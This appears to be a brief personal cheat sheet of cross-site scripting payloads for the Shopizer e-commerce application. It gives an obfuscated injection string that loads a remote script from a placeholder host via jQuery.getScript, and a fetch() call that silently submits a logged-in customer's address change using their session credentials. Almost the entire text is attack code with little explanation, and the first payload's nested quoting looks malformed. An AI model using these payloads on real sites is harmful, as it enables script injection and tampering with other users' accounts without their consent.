1. Based on Shopizer example, only for app with JQuery (base64 encode the entire thing inside single quote):

   '+btoa(eval(atob('jQuery.getScript('http://domain/xss.js')')))+'
   

2. How to send a POST request through XSS (you need to first study how the POST request work and change accordingly):

    fetch('http://shopizer:8080/shop/customer/updateAddress.html',{
   method: 'POST',
   mode: 'same-origin',
   credentials: 'same-origin',
   headers: {
     'Content-Type':'application/x-www-form-urlencoded'
   }, 
   body:'customerId=&billingAddress=false&firstName=hax&lastName=hax&company=&address=hax&city=hax&country=AL&stateProvince=z&postalCode=z&phone=z&submitAddress=Change address'
   })